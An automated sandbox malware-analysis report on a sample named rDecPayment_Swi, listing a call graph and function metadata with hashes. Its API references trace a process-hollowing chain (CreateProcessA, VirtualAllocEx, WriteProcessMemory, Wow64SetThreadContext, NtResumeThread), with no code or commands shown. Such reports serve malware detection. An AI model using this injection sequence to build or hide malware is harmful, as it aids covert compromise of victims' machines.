60f7f6d 50838->50839 50840 60f9478 10 API calls 50839->50840 50840->50839 50842 60f7f6d 50841->50842 50843 60f9478 10 API calls 50842->50843 50843->50842 50845 60f949d 50844->50845 50848 60f9814 50845->50848 50849 60f987d 50848->50849 50850 60f9543 50848->50850 50854 60f9e00 50849->50854 50868 60f9df0 50849->50868 50851 60f98a8 50855 60f9e15 50854->50855 50861 60f9e37 50855->50861 50882 60fade4 50855->50882 50887 60fb005 50855->50887 50893 60fb2c6 50855->50893 50898 60fab09 50855->50898 50903 60fb52a 50855->50903 50908 60fa3cb 50855->50908 50913 60faa0f 50855->50913 50918 60fae0f 50855->50918 50923 60fb1bf 50855->50923 50928 60faf82 50855->50928 50933 60fb623 50855->50933 50861->50851 50869 60f9e00 50868->50869 50870 60fae0f 2 API calls 50869->50870 50871 60faa0f 2 API calls 50869->50871 50872 60fa3cb 2 API calls 50869->50872 50873 60f9e37 50869->50873 50874 60fb52a 2 API calls 50869->50874 50875 60fab09 2 API calls 50869->50875 50876 60fb2c6 2 API calls 50869->50876 50877 60fb005 2 API calls 50869->50877 50878 60fade4 2 API calls 50869->50878 50879 60fb623 2 API calls 50869->50879 50880 60faf82 2 API calls 50869->50880 50881 60fb1bf 2 API calls 50869->50881 50870->50873 50871->50873 50872->50873 50873->50851 50874->50873 50875->50873 50876->50873 50877->50873 50878->50873 50879->50873 50880->50873 50881->50873 50883 60fb06c 50882->50883 50938 6153dd0 50883->50938 50942 6153dd8 50883->50942 50884 60fb0a8 50888 60fa3b6 50887->50888 50889 60fb046 50887->50889 50888->50861 50891 6153dd0 NtResumeThread 50889->50891 50892 6153dd8 NtResumeThread 50889->50892 50890 60fb0a8 50891->50890 50892->50890 50894 60fb2da 50893->50894 50946 61536f0 50894->50946 50950 61536e8 50894->50950 50895 60fa3b6 50895->50861 50900 60fab18 50898->50900 50899 60fa3b6 50899->50861 50954 6152940 50900->50954 50958 6152938 50900->50958 50904 60fb539 50903->50904 50906 6152940 Wow64SetThreadContext 50904->50906 50907 6152938 Wow64SetThreadContext 50904->50907 50905 60fa3b6 50905->50861 50906->50905 50907->50905 50909 60fa3e9 50908->50909 50962 6152fe8 50909->50962 50966 6152ff0 50909->50966 50910 60fa3b6 50910->50861 50914 60faa1e 50913->50914 50916 61536f0 WriteProcessMemory 50914->50916 50917 61536e8 WriteProcessMemory 50914->50917 50915 60fa3b6 50915->50861 50916->50915 50917->50915 50919 60fae18 50918->50919 50970 60fbba2 50919->50970 50991 60fbbb0 50919->50991 50924 60fb1ce 50923->50924 50926 61536f0 WriteProcessMemory 50924->50926 50927 61536e8 WriteProcessMemory 50924->50927 50925 60fa3b6 50925->50861 50926->50925 50927->50925 50929 60fa3b6 50928->50929 50930 60fa3f4 50928->50930 50929->50861 50931 6152ff0 VirtualAllocEx 50930->50931 50932 6152fe8 VirtualAllocEx 50930->50932 50931->50929 50932->50929 50934 60fa3f4 50933->50934 50935 60fa3b6 50933->50935 50936 6152ff0 VirtualAllocEx 50934->50936 50937 6152fe8 VirtualAllocEx 50934->50937 50935->50861 50936->50935 50937->50935 50939 6153dd8 NtResumeThread 50938->50939 50941 6153e78 50939->50941 50941->50884 50943 6153e21 NtResumeThread 50942->50943 50945 6153e78 50943->50945 50945->50884 50947 615373c WriteProcessMemory 50946->50947 50949 61537d5 50947->50949 50949->50895 50951 61536f0 WriteProcessMemory 50950->50951 50953 61537d5 50951->50953 50953->50895 50955 6152989 Wow64SetThreadContext 50954->50955 50957 6152a01 50955->50957 50957->50899 50959 6152940 Wow64SetThreadContext 50958->50959 50961 6152a01 50959->50961 50961->50899 50963 6152ff0 VirtualAllocEx 50962->50963 50965 61530ac 50963->50965 50965->50910 50967 6153034 VirtualAllocEx 50966->50967 50969 61530ac 50967->50969 50969->50910 50971 60fbbb0 50970->50971 51012 60fc96a 50971->51012 51016 60fc0ec 50971->51016 51020 60fc66c 50971->51020 51024 60fc1ed 50971->51024 51028 60fc5f0 50971->51028 51032 60fc171 50971->51032 51036 60fc012 50971->51036 51040 60fc335 50971->51040 51044 60fc2f5 50971->51044 51048 60fc0d7 50971->51048 51052 60fc0b7 50971->51052 51056 60fc239 50971->51056 51060 60fc71a 50971->51060 51064 60fc89e 50971->51064 51068 60fc020 50971->51068 51072 60fc281 50971->51072 51076 60fc3a3 50971->51076 51080 60fc486 50971->51080 50992 60fbbc7 50991->50992 50994 60fc1ed 2 API calls 50992->50994 50995 60fc66c 2 API calls 50992->50995 50996 60fc0ec 2 API calls 50992->50996 50997 60fc96a 2 API calls 50992->50997 50998 60fc486 2 API calls 50992->50998 50999 60fc3a3 2 API calls 50992->50999 51000 60fc281 2 API calls 50992->51000 51001 60fc020 2 API calls 50992->51001 51002 60fc89e 2 API calls 50992->51002 51003 60fc71a 2 API calls 50992->51003 51004 60fc239 2 API calls 50992->51004 51005 60fc0b7 2 API calls 50992->51005 51006 60fc0d7 2 API calls 50992->51006 51007 60fc2f5 2 API calls 50992->51007 51008 60fc335 2 API calls 50992->51008 51009 60fc012 2 API calls 50992->51009 51010 60fc171 2 API calls 50992->51010 51011 60fc5f0 2 API calls 50992->51011 50993 60fa3b6 50993->50861 50994->50993 50995->50993 50996->50993 50997->50993 50998->50993 50999->50993 51000->50993 51001->50993 51002->50993 51003->50993 51004->50993 51005->50993 51006->50993 51007->50993 51008->50993 51009->50993 51010->50993 51011->50993 51013 60fc09f 51012->51013 51084 615207e 51013->51084 51088 6152088 51013->51088 51017 60fc09f 51016->51017 51018 615207e CreateProcessA 51017->51018 51019 6152088 CreateProcessA 51017->51019 51018->51017 51019->51017 51021 60fc09f 51020->51021 51021->51020 51022 615207e CreateProcessA 51021->51022 51023 6152088 CreateProcessA 51021->51023 51022->51021 51023->51021 51025 60fc09f 51024->51025 51026 615207e CreateProcessA 51025->51026 51027 6152088 CreateProcessA 51025->51027 51026->51025 51027->51025 51029 60fc09f 51028->51029 51030 615207e CreateProcessA 51029->51030 51031 6152088 CreateProcessA 51029->51031 51030->51029 51031->51029 51033 60fc09f 51032->51033 51034 615207e CreateProcessA 51033->51034 51035 6152088 CreateProcessA 51033->51035 51034->51033 51035->51033 51037 60fc020 51036->51037 51038 615207e CreateProcessA 51037->51038 51039 6152088 CreateProcessA 51037->51039 51038->51037 51039->51037 51041 60fc09f 51040->51041 51042 615207e CreateProcessA 51041->51042 51043 6152088 CreateProcessA 51041->51043 51042->51041 51043->51041 51045 60fc09f 51044->51045 51046 615207e CreateProcessA 51045->51046 51047 6152088 CreateProcessA 51045->51047 51046->51045 51047->51045 51049 60fc09f 51048->51049 51050 615207e CreateProcessA 51049->51050 51051 6152088 CreateProcessA 51049->51051 51050->51049 51051->51049 51053 60fc09f 51052->51053 51054 615207e CreateProcessA 51053->51054 51055 6152088 CreateProcessA 51053->51055 51054->51053 51055->51053 51057 60fc09f 51056->51057 51058 615207e CreateProcessA 51057->51058 51059 6152088 CreateProcessA 51057->51059 51058->51057 51059->51057 51061 60fc09f 51060->51061 51062 615207e CreateProcessA 51061->51062 51063 6152088 CreateProcessA 51061->51063 51062->51061 51063->51061 51065 60fc09f 51064->51065 51066 615207e CreateProcessA 51065->51066 51067 6152088 CreateProcessA 51065->51067 51066->51065 51067->51065 51069 60fc053 51068->51069 51070 615207e CreateProcessA 51069->51070 51071 6152088 CreateProcessA 51069->51071 51070->51069 51071->51069 51073 60fc09f 51072->51073 51074 615207e CreateProcessA 51073->51074 51075 6152088 CreateProcessA 51073->51075 51074->51073 51075->51073 51077 60fc09f 51076->51077 51078 615207e CreateProcessA 51077->51078 51079 6152088 CreateProcessA 51077->51079 51078->51077 51079->51077 51081 60fc09f 51080->51081 51082 615207e CreateProcessA 51081->51082 51083 6152088 CreateProcessA 51081->51083 51082->51081 51083->51081 51085 6152088 CreateProcessA 51084->51085 51087 6152304 51085->51087 51089 6152108 CreateProcessA 51088->51089 51091 6152304 51089->51091

                                            Executed Functions

                                            Function 05E33AA0 Relevance: 16.2, Strings: 12, Instructions: 1172COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2334741453.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5e30000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: ,aq$4$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
                                            • API String ID: 0-3443518476
                                            • Opcode ID: d1711a16eb04535d6876e7aeaec07e7c8b3a23ec2fecde98f02c2a1269483019
                                            • Instruction ID: f066f865beadccf12c1066e8e243aa558928fbbf260f220fc5de55b26046af76
                                            • Opcode Fuzzy Hash: d1711a16eb04535d6876e7aeaec07e7c8b3a23ec2fecde98f02c2a1269483019
                                            • Instruction Fuzzy Hash: 36B20834A00228DFEB14CFA9C889BADB7B6FF88704F159599E545AB3A4DB709C41CF50
                                            Function 05E33DC7 Relevance: 8.0, Strings: 6, Instructions: 495COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2334741453.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5e30000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: ,aq$4$$]q$$]q$$]q$$]q
                                            • API String ID: 0-324474496
                                            • Opcode ID: abad85cc70860c662209573a121f61312c3b4b4389f859ead214296894c9b0a5
                                            • Instruction ID: 7393850cd8362745dd7ade45d253e9ada801821b57b47e384f7a58935dc8b1f2
                                            • Opcode Fuzzy Hash: abad85cc70860c662209573a121f61312c3b4b4389f859ead214296894c9b0a5
                                            • Instruction Fuzzy Hash: 45221A34A00225CFEB14DF68C989BADB7B2FF48304F1485A9E549AB3A5DB709D81CF50
                                            Function 05E37410 Relevance: 4.4, Strings: 3, Instructions: 684COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2334741453.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5e30000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: (_]q$Pl]q$$]q
                                            • API String ID: 0-1486637480
                                            • Opcode ID: 5b12e28776c57c26e6b0f968444983b60b663904c9922df00e85d299f6448ae8
                                            • Instruction ID: fb42d97cc81814a65c178132c82392f5f9b91f76c9a30ca882ed52fb0d094ab7
                                            • Opcode Fuzzy Hash: 5b12e28776c57c26e6b0f968444983b60b663904c9922df00e85d299f6448ae8
                                            • Instruction Fuzzy Hash: 294268B4B40208CFDB18DF28C599A6A7BF7FF88304B1194A9D442CB365EA35ED41CB61
                                            Function 060FDC88 Relevance: 3.1, Strings: 2, Instructions: 618COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1649 60fdc88-60fdca9 1650 60fdcab 1649->1650 1651 60fdcb0-60fdd40 call 60fe7e8 1649->1651 1650->1651 1656 60fdd46-60fdd93 1651->1656 1659 60fdd95-60fdda0 1656->1659 1660 60fdda2 1656->1660 1661 60fddac-60fdec7 1659->1661 1660->1661 1672 60fded9-60fdf04 1661->1672 1673 60fdec9-60fdecf 1661->1673 1674 60fe6c9-60fe6e5 1672->1674 1673->1672 1675 60fe6eb-60fe706 1674->1675 1676 60fdf09-60fe06c call 60fcb58 1674->1676 1687 60fe07e-60fe20c call 60f9ca8 call 60f6a30 1676->1687 1688 60fe06e-60fe074 1676->1688 1700 60fe20e-60fe212 1687->1700 1701 60fe271-60fe27b 1687->1701 1688->1687 1703 60fe21a-60fe26c 1700->1703 1704 60fe214-60fe215 1700->1704 1702 60fe4a2-60fe4c1 1701->1702 1706 60fe4c7-60fe4f1 1702->1706 1707 60fe280-60fe3c6 call 60fcb58 1702->1707 1705 60fe547-60fe5b2 1703->1705 1704->1705 1724 60fe5c4-60fe60f 1705->1724 1725 60fe5b4-60fe5ba 1705->1725 1713 60fe544-60fe545 1706->1713 1714 60fe4f3-60fe541 1706->1714 1736 60fe3cc-60fe498 call 60fcb58 1707->1736 1737 60fe49b-60fe49c 1707->1737 1713->1705 1714->1713 1727 60fe6ae-60fe6c6 1724->1727 1728 60fe615-60fe6ad 1724->1728 1725->1724 1727->1674 1728->1727 1736->1737 1737->1702
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2335730568.00000000060F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_60f0000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: fbq$8
                                            • API String ID: 0-3186246319
                                            • Opcode ID: abadff03bdb5c0ba0fdbc59450c6917ff3d8270bfa0c1ac614b763e7ef7a2295
                                            • Instruction ID: 568b0094299d43c1585f3e0f70911cf9bfe98ae14b1e90790323a80b776219a3
                                            • Opcode Fuzzy Hash: abadff03bdb5c0ba0fdbc59450c6917ff3d8270bfa0c1ac614b763e7ef7a2295
                                            • Instruction Fuzzy Hash: BD52C575E006298FDBA4DF69C850ADDB7B2FB89300F1486AAD549B7354DB30AE81CF50
                                            Function 060FDC79 Relevance: 2.7, Strings: 2, Instructions: 166COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 2002 60fdc79-60fdca9 2003 60fdcab 2002->2003 2004 60fdcb0-60fdd40 call 60fe7e8 2002->2004 2003->2004 2009 60fdd46-60fdd93 2004->2009 2012 60fdd95-60fdda0 2009->2012 2013 60fdda2 2009->2013 2014 60fddac-60fdec7 2012->2014 2013->2014 2025 60fded9-60fdf04 2014->2025 2026 60fdec9-60fdecf 2014->2026 2027 60fe6c9-60fe6e5 2025->2027 2026->2025 2028 60fe6eb-60fe706 2027->2028 2029 60fdf09-60fe06c call 60fcb58 2027->2029 2040 60fe07e-60fe20c call 60f9ca8 call 60f6a30 2029->2040 2041 60fe06e-60fe074 2029->2041 2053 60fe20e-60fe212 2040->2053 2054 60fe271-60fe27b 2040->2054 2041->2040 2056 60fe21a-60fe26c 2053->2056 2057 60fe214-60fe215 2053->2057 2055 60fe4a2-60fe4c1 2054->2055 2059 60fe4c7-60fe4f1 2055->2059 2060 60fe280-60fe3c6 call 60fcb58 2055->2060 2058 60fe547-60fe5b2 2056->2058 2057->2058 2077 60fe5c4-60fe60f 2058->2077 2078 60fe5b4-60fe5ba 2058->2078 2066 60fe544-60fe545 2059->2066 2067 60fe4f3-60fe541 2059->2067 2089 60fe3cc-60fe498 call 60fcb58 2060->2089 2090 60fe49b-60fe49c 2060->2090 2066->2058 2067->2066 2080 60fe6ae-60fe6c6 2077->2080 2081 60fe615-60fe6ad 2077->2081 2078->2077 2080->2027 2081->2080 2089->2090 2090->2055
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2335730568.00000000060F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_60f0000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: fbq$h
                                            • API String ID: 0-3598783323
                                            • Opcode ID: df503cfc35e197cbd19aff2d36c038e46f94a5e5cead243827d91c33872ca0fc
                                            • Instruction ID: 82e2335e71d861fe59b6e3a86dc237bce9b95dee76d92f6371eb799a836e7f56
                                            • Opcode Fuzzy Hash: df503cfc35e197cbd19aff2d36c038e46f94a5e5cead243827d91c33872ca0fc
                                            • Instruction Fuzzy Hash: 4771F575E00629CFEB64DF6AC850BD9BBB2BF89300F14C2AAD549B7254DB305A81CF50
                                            Function 01161CC8 Relevance: 2.7, Strings: 2, Instructions: 165COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 2098 1161cc8-1161ce2 2099 1161ce4 2098->2099 2100 1161ce9-1161cf0 2098->2100 2099->2100 2101 1161cfb-1161f6e 2100->2101
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2313440096.0000000001160000.00000040.00000800.00020000.00000000.sdmp, Offset: 01160000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_1160000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4']q$4']q
                                            • API String ID: 0-3120983240
                                            • Opcode ID: bf2c14fa2c58d5a10840c438af3923496936c5e698adb5492ca9a16fd127b572
                                            • Instruction ID: 4c33242836ab64943006feab6389462d54b635fbe7ab7521ea2bd6c0d1f23a0b
                                            • Opcode Fuzzy Hash: bf2c14fa2c58d5a10840c438af3923496936c5e698adb5492ca9a16fd127b572
                                            • Instruction Fuzzy Hash: D5711A70A02219CFD708EF6BE981A8EBBF6BF85340F14D12AD4449B268EF395905CF41
                                            Function 01161CC6 Relevance: 2.7, Strings: 2, Instructions: 164COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 2131 1161cc6-1161ce2 2132 1161ce4 2131->2132 2133 1161ce9-1161cf0 2131->2133 2132->2133 2134 1161cfb-1161f6e 2133->2134
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2313440096.0000000001160000.00000040.00000800.00020000.00000000.sdmp, Offset: 01160000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_1160000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4']q$4']q
                                            • API String ID: 0-3120983240
                                            • Opcode ID: 400c75809da223f0ed668e7b21aeb059f5365296c4bedb41c45c9e83db08e997
                                            • Instruction ID: d6ce2114fbfeb0d723ad4735137db2344f3664d840a6a849cabf22c41ae21584
                                            • Opcode Fuzzy Hash: 400c75809da223f0ed668e7b21aeb059f5365296c4bedb41c45c9e83db08e997
                                            • Instruction Fuzzy Hash: 2D711A70A02219CFD708EF6BE981A9EBBF2BF85340F14D52AD4449B268DF395905CF41
                                            Function 060D3E58 Relevance: 1.8, Strings: 1, Instructions: 600COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2335641417.00000000060D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_60d0000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: (aq
                                            • API String ID: 0-600464949
                                            • Opcode ID: f497af5eec6cfecc0f5da22070c5a2bded59eb49693aa08a2cdbddd75a29e875
                                            • Instruction ID: bc19a673bc00520c4f85207bfd3590001a6bfbfb7289dd2b667aac5d3b2ef477
                                            • Opcode Fuzzy Hash: f497af5eec6cfecc0f5da22070c5a2bded59eb49693aa08a2cdbddd75a29e875
                                            • Instruction Fuzzy Hash: 00325674A00316CFDB88DFA9C49466EFBF2BF89300F14862AD55AD7385DB34A945CB81
                                            Function 061514D0 Relevance: 1.6, APIs: 1, Instructions: 108nativeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 0615158D
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2335846710.0000000006150000.00000040.00000800.00020000.00000000.sdmp, Offset: 06150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6150000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID: MemoryProtectVirtual
                                            • String ID:
                                            • API String ID: 2706961497-0
                                            • Opcode ID: 04de4379284a40d84c940243c83d27493ef5931de64891c15c20e6905a00e4fd
                                            • Instruction ID: ee2f6290dcc4c93bb48b2f3299108a317e59e48b4bff5bcfff879f2f6ebc3d2b
                                            • Opcode Fuzzy Hash: 04de4379284a40d84c940243c83d27493ef5931de64891c15c20e6905a00e4fd
                                            • Instruction Fuzzy Hash: 154178B8D00258DFCF10CFAAD981ADEFBB5BB49310F14942AE819B7210D735A945CFA4
                                            Function 061514D8 Relevance: 1.6, APIs: 1, Instructions: 105nativeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 0615158D
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2335846710.0000000006150000.00000040.00000800.00020000.00000000.sdmp, Offset: 06150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6150000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID: MemoryProtectVirtual
                                            • String ID:
                                            • API String ID: 2706961497-0
                                            • Opcode ID: d14c8770dfceeadaf936ca8bed5b4f2e6f174e4962d75c28c57d50c44d190f01
                                            • Instruction ID: a5a641f44251477cd908c5b39cd1766a3b16d8b17f57fc9d6455c94c38896868
                                            • Opcode Fuzzy Hash: d14c8770dfceeadaf936ca8bed5b4f2e6f174e4962d75c28c57d50c44d190f01
                                            • Instruction Fuzzy Hash: B24178B9D00258DFCF10CFAAD985ADEFBB5BB49310F10942AE819B7210D735A945CFA4
                                            Function 060D96E8 Relevance: 1.6, Strings: 1, Instructions: 338COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2335641417.00000000060D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_60d0000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: PH]q
                                            • API String ID: 0-3168235125
                                            • Opcode ID: 1862085887505b537cc235abc41318834ac7aed88ad033ed8fc8ccc12df8ec61
                                            • Instruction ID: 6b6ee21018d9ae705a7b9ae104d88743dc1fcb3b19dc1d4cdedcaed7acea09c1
                                            • Opcode Fuzzy Hash: 1862085887505b537cc235abc41318834ac7aed88ad033ed8fc8ccc12df8ec61
                                            • Instruction Fuzzy Hash: 0DF1F670E45318CFEB94CF6AD884B9DBBF2BF4A304F1082A9D449A7285DB745985CF41
                                            Function 06153DD0 Relevance: 1.6, APIs: 1, Instructions: 85nativethreadCOMMON
                                            Download Yara Rule
                                            APIs
                                            • NtResumeThread.NTDLL(?,?), ref: 06153E66
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2335846710.0000000006150000.00000040.00000800.00020000.00000000.sdmp, Offset: 06150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6150000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID: ResumeThread
                                            • String ID:
                                            • API String ID: 947044025-0
                                            • Opcode ID: 268f7c332e60e16ccac1b959237657326ebaa88cd3c9acdb1d5ce70ebffa0277
                                            • Instruction ID: 8e4c5ed9dbccad19f951474556a28acd03ed4ab69e5045ffa64f397df28ed351
                                            • Opcode Fuzzy Hash: 268f7c332e60e16ccac1b959237657326ebaa88cd3c9acdb1d5ce70ebffa0277
                                            • Instruction Fuzzy Hash: D8319AB5D01218DFCB14CFAAD984A9EFBF5FB49310F10942AE919B7200D735A946CFA4
                                            Function 06153DD8 Relevance: 1.6, APIs: 1, Instructions: 82nativethreadCOMMON
                                            Download Yara Rule
                                            APIs
                                            • NtResumeThread.NTDLL(?,?), ref: 06153E66
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2335846710.0000000006150000.00000040.00000800.00020000.00000000.sdmp, Offset: 06150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6150000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID: ResumeThread
                                            • String ID:
                                            • API String ID: 947044025-0
                                            • Opcode ID: fa79910cdc891391626416694d132957fdfe98bb7b7b1454d407eaadad676613
                                            • Instruction ID: 3d6798d88ab4d0aad3f16a9e2a27164ca421e63eeffe818654d6f123e77d1b49
                                            • Opcode Fuzzy Hash: fa79910cdc891391626416694d132957fdfe98bb7b7b1454d407eaadad676613
                                            • Instruction Fuzzy Hash: 3D31ABB4D01218DFCB10CFAAD984A9EFBF5FB49310F10942AE819B7200D735A945CFA4
                                            Function 060D96D8 Relevance: 1.6, Strings: 1, Instructions: 331COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2335641417.00000000060D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_60d0000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: PH]q
                                            • API String ID: 0-3168235125
                                            • Opcode ID: 0c2c1dc502ef3038a0fadd8c7599077ceaa0aef0a469dcd4fc919204fa7fe879
                                            • Instruction ID: c210443b971efa0c49383f1c33dc506a7141bd39308a4d736beed03640851ac6
                                            • Opcode Fuzzy Hash: 0c2c1dc502ef3038a0fadd8c7599077ceaa0aef0a469dcd4fc919204fa7fe879
                                            • Instruction Fuzzy Hash: 94E1F574E41218CFEBA4CF6AD885B9EBBF2FF49304F1082A9D449A7285DB745985CF40
                                            Function 05E57880 Relevance: 1.5, Strings: 1, Instructions: 259COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2334963371.0000000005E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5e50000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Te]q
                                            • API String ID: 0-52440209
                                            • Opcode ID: f75408f60206fb51aa06b6682019cf9e4d139c95c454d76c0d0329b97a0f8fa7
                                            • Instruction ID: 05fc7e1011ed40812ed852fb6b728945ef7c4cd08a73c1f47203486cbf8c3f04
                                            • Opcode Fuzzy Hash: f75408f60206fb51aa06b6682019cf9e4d139c95c454d76c0d0329b97a0f8fa7
                                            • Instruction Fuzzy Hash: 91B1D570E05228CFDB54CFAAD844BADBBF2FF49354F1090A9D849A7255EB705995CF00
                                            Function 05E57870 Relevance: 1.5, Strings: 1, Instructions: 253COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2334963371.0000000005E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5e50000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Te]q
                                            • API String ID: 0-52440209
                                            • Opcode ID: 6c0635ea32bc262c0107db613f903b8d55fd37b69183bc95f26de599059f61a5
                                            • Instruction ID: 51203adfcc79b87c5886eb1ae0946281ca4601a439ff78127cd6d4dc38228152
                                            • Opcode Fuzzy Hash: 6c0635ea32bc262c0107db613f903b8d55fd37b69183bc95f26de599059f61a5
                                            • Instruction Fuzzy Hash: C3B1F470E04228CFDB54CFAAC884B9DBBF2FF89354F1490A9D849A7255EB709995CF00
                                            Function 060F7670 Relevance: .3, Instructions: 336COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2335730568.00000000060F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_60f0000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b18979a34649572bc9cce3528a3e6bce54e3492ee7b7f5be2d58d78fe0c76f85
                                            • Instruction ID: 4d9aa4f1a2d13eca70d1f8175f7b84f0d07961bd6638577cc2847f04e367206f
                                            • Opcode Fuzzy Hash: b18979a34649572bc9cce3528a3e6bce54e3492ee7b7f5be2d58d78fe0c76f85
                                            • Instruction Fuzzy Hash: BBE14870E50218CFEBA4DFA9D844B9DBBF2FF49300F1081AAD119AB694DB749985CF01
                                            Function 060F76A8 Relevance: .3, Instructions: 320COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2335730568.00000000060F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_60f0000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5143fee6055c1e54a994d2fe14dc79318c75a32db600b20d38d3d74945c6a16e
                                            • Instruction ID: d783eb5f6fca213c599b8e7e76b2ad3cc5c2fb4cc1e5f0932f76c7f23202539b
                                            • Opcode Fuzzy Hash: 5143fee6055c1e54a994d2fe14dc79318c75a32db600b20d38d3d74945c6a16e
                                            • Instruction Fuzzy Hash: 40E11370E50218CFEBA4DFA9D844B9DBBF2FF49300F1081AAD519AB694DB749985CF01
                                            Function 060F5948 Relevance: .3, Instructions: 278COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2335730568.00000000060F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_60f0000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d5fad246d490bd09725ba7936bd01cd9f40e89cc2d53e8fe3b922140194eb1cd
